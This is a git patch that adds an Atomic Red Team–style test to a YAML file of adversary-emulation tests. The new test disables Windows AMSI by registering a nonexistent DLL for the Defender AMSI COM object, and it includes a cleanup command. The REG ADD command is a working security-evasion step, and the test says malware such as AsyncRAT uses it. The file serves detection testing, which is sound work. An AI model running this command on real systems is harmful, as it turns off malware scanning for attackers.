From 92e83732e699f6bc69ffe67d3c06a31900eafce8 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Fri, 30 Jun 2023 07:55:02 -0600
Subject: [PATCH] AMSI COM

---
 atomics/T1562.001/T1562.001.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 1fc39ba9..cf54ca53 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -875,3 +875,18 @@ atomic_tests:
       reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
     name: powershell
     elevation_required: true
+- name: AMSI Bypass - Override AMSI via COM
+  description: |
+    With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
+    This is currently being used by AsyncRAT and others. 
+    https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html
+    https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
+    cleanup_command: |
+      REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
+    name: command_prompt
+    elevation_required: true
\ No newline at end of file